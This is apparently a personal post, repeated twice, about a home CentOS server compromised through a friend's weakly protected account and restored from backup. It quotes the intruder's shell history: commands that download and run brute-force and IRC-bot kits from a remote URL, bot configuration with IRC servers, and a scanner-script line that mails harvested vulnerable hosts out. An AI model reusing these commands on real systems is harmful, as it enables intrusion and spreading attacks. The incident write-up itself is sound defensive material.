A little story... I had an old p3 running centos 3 for years with a static ip address doing mail, web, dns etc. A year or so back I virtualized it onto a bigger server at home to cut down on noise & electricity. It just sits there & works.
Well I the internet was running very slow the other night & I put it down to zen. However the next day when I logged on to do something & I noticed the cpu running at 99%
This is my dns server & squid proxy, hence the internet running slow.
top showed me a proccess called pscan2 was taking up all the cpu running under user chris. Last showed a user chris had logged in on a few occasions over the previous few days.
chris pts/0 89.44.96.91 Wed Feb 20 21:25 - 21:25 (00:00)
mark pts/1 192.168.0.26 Wed Feb 20 18:37 - 19:15 (00:37)
mark pts/0 195.157.228.9 Wed Feb 20 09:11 - 19:27 (10:15)
chris pts/0 89.44.96.91 Wed Feb 20 00:41 - 00:41 (00:00)
mark pts/0 192.168.0.26 Tue Feb 19 21:10 - 23:22 (02:12)
mark pts/0 192.168.0.2 Tue Feb 19 20:06 - 20:36 (00:29)
chris pts/1 89.44.96.91 Tue Feb 19 16:05 - 16:05 (00:00)
chris pts/2 Tue Feb 19 11:27 - 11:28 (00:00)
chris pts/1 89.44.96.91 Tue Feb 19 11:20 - 11:28 (00:07)
mark pts/0 195.157.228.9 Tue Feb 19 09:16 - 17:54 (08:37)
chris pts/0 137.110.134.95 Tue Feb 19 01:51 - 04:41 (02:49)
Now chris is an account I set up for a friend so he could use the machine as a web proxy but he hasn't used it for months now...
bash_history gave me the following
w
ps -x
passwd
ls
uname -a
wget www.geocities.com/chiransorin/ssh.tgz
cat /proc/cpuinfo
tar xzvf ssh.tgz
cd ssh
./a 152.2
cd
ls
wget www.geocities.com/chiransorin/bot.tgz
tar xzvf bot.tgz
cd bot
ls
pico inst
nano inst
chmod +x *
./start shellro
cd
ls
cd ssh
chmod +x *
./screeb
screen
cd ssh
ps -x
ls
cat vuln.txt
cd ssh
ps -x
ls
cat vuln.txt
cd ssh
ps -x
ls
cat vuln.txt
./start 84
It seems they had downloaded 2 scripts called bot & ssh to bruteforce other linux machine & an irc bot program. Some bits from within the bot directory:-
nick Hupp
login Hammerness
virtual 82.69.154.50
ircname Daly
modes +ix-ws
cmdchar .
userfile 82.69.154.50.user2
set BANMODES 6
set OPMODES 6
tog SPY 1
channel #shellro
tog PROT 1
nick Luoma
login Goncalves
virtual 82.69.154.50
ircname Memisoglu
modes +ix-ws
cmdchar .
userfile 82.69.154.50.user
set BANMODES 6
set OPMODES 6
tog SPY 1
channel #shellro
tog PROT 1
server 69.16.172.40 6667
server 69.16.172.34 6667
echo "handle x " >> $2.user
echo "mask *!*@SirSorian.users.undernet.org " >> $2.user
echo "prot 4" >> $2.user
echo "channel * " >> $2.user
echo "access 100 " >> $2.user
bits from within the ssh directory:-
clear
echo "********************************************************************"
echo "* -===================== #Hack-Ro & Sorian Present :=============- *"
echo "* -== Lastest version of brute force password checker ==- *"
echo "* -= REMEMBER * This is NOT a FREE SCANNER * Behave =- *"
echo "* -== Kill the WABBIT !!! ==- *"
echo "*****************Greets to all #Hack-Ro members*********************"
cat vuln.txt |mail -s "vuln.txt" [email protected]
killall -9 a
else
echo #-==== Sorian & #Hack-Ro ====-#
killall -9 a
killall -9 pscan2
fi
A netstat showed lots of open ssh connections to other machine. I just shut the machine down. Now as its virtual I take backups of my virtual machine drive every weekend, so just restore from backup & restart the machine, not forgetting to remove the chris account
and we are good to go again!
So perhaps the moral is.. dont let others use your server as they may have a rubbish password & take regular backups.
Well I the internet was running very slow the other night & I put it down to zen. However the next day when I logged on to do something & I noticed the cpu running at 99%
This is my dns server & squid proxy, hence the internet running slow.top showed me a proccess called pscan2 was taking up all the cpu running under user chris. Last showed a user chris had logged in on a few occasions over the previous few days.
chris pts/0 89.44.96.91 Wed Feb 20 21:25 - 21:25 (00:00)
mark pts/1 192.168.0.26 Wed Feb 20 18:37 - 19:15 (00:37)
mark pts/0 195.157.228.9 Wed Feb 20 09:11 - 19:27 (10:15)
chris pts/0 89.44.96.91 Wed Feb 20 00:41 - 00:41 (00:00)
mark pts/0 192.168.0.26 Tue Feb 19 21:10 - 23:22 (02:12)
mark pts/0 192.168.0.2 Tue Feb 19 20:06 - 20:36 (00:29)
chris pts/1 89.44.96.91 Tue Feb 19 16:05 - 16:05 (00:00)
chris pts/2 Tue Feb 19 11:27 - 11:28 (00:00)
chris pts/1 89.44.96.91 Tue Feb 19 11:20 - 11:28 (00:07)
mark pts/0 195.157.228.9 Tue Feb 19 09:16 - 17:54 (08:37)
chris pts/0 137.110.134.95 Tue Feb 19 01:51 - 04:41 (02:49)
Now chris is an account I set up for a friend so he could use the machine as a web proxy but he hasn't used it for months now...
bash_history gave me the following
w
ps -x
passwd
ls
uname -a
wget www.geocities.com/chiransorin/ssh.tgz
cat /proc/cpuinfo
tar xzvf ssh.tgz
cd ssh
./a 152.2
cd
ls
wget www.geocities.com/chiransorin/bot.tgz
tar xzvf bot.tgz
cd bot
ls
pico inst
nano inst
chmod +x *
./start shellro
cd
ls
cd ssh
chmod +x *
./screeb
screen
cd ssh
ps -x
ls
cat vuln.txt
cd ssh
ps -x
ls
cat vuln.txt
cd ssh
ps -x
ls
cat vuln.txt
./start 84
It seems they had downloaded 2 scripts called bot & ssh to bruteforce other linux machine & an irc bot program. Some bits from within the bot directory:-
nick Hupp
login Hammerness
virtual 82.69.154.50
ircname Daly
modes +ix-ws
cmdchar .
userfile 82.69.154.50.user2
set BANMODES 6
set OPMODES 6
tog SPY 1
channel #shellro
tog PROT 1
nick Luoma
login Goncalves
virtual 82.69.154.50
ircname Memisoglu
modes +ix-ws
cmdchar .
userfile 82.69.154.50.user
set BANMODES 6
set OPMODES 6
tog SPY 1
channel #shellro
tog PROT 1
server 69.16.172.40 6667
server 69.16.172.34 6667
echo "handle x " >> $2.user
echo "mask *!*@SirSorian.users.undernet.org " >> $2.user
echo "prot 4" >> $2.user
echo "channel * " >> $2.user
echo "access 100 " >> $2.user
bits from within the ssh directory:-
clear
echo "********************************************************************"
echo "* -===================== #Hack-Ro & Sorian Present :=============- *"
echo "* -== Lastest version of brute force password checker ==- *"
echo "* -= REMEMBER * This is NOT a FREE SCANNER * Behave =- *"
echo "* -== Kill the WABBIT !!! ==- *"
echo "*****************Greets to all #Hack-Ro members*********************"
cat vuln.txt |mail -s "vuln.txt" [email protected]
killall -9 a
else
echo #-==== Sorian & #Hack-Ro ====-#
killall -9 a
killall -9 pscan2
fi
A netstat showed lots of open ssh connections to other machine. I just shut the machine down. Now as its virtual I take backups of my virtual machine drive every weekend, so just restore from backup & restart the machine, not forgetting to remove the chris account
and we are good to go again!So perhaps the moral is.. dont let others use your server as they may have a rubbish password & take regular backups.

)